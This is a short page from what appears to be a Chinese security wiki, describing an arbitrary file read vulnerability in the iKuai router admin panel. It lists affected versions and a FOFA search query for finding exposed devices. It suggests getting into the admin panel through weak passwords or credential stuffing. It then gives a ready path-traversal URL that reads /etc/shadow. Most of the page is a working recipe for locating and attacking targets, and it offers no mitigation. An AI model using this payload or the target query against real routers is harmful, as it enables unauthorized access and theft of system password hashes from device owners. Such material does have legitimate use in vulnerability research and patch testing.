menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 爱快路由器后台任意文件读取 chevron_right 爱快路由器后台任意文件读取.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    爱快路由器后台任意文件读取.md
    503 B / 2021-07-15 19:46:49
        ## 爱快路由器后台任意文件读取
    
    ## 漏洞描述
    
    爱块路由器后台存在任意文件读取漏洞,攻击者可通过漏洞读取敏感信息
    
    ## 漏洞影响
    
    > 3.3.0 x64 Build201912171705 以下版本
    
    ## FOFA
    
    > app="iKuai-产品"
    
    ## 漏洞复现
    
    该漏洞需要先通过某种手段进入到后台,如弱口令、撞库等。
    
    进入到后台之后可通过以下url进行任意文件读取
    
    ```
    http://x.x.x.x/Action/download?filename=../../../../../../etc/shadow HTTP/1.1
    ```
    
    
    
    links
    file_download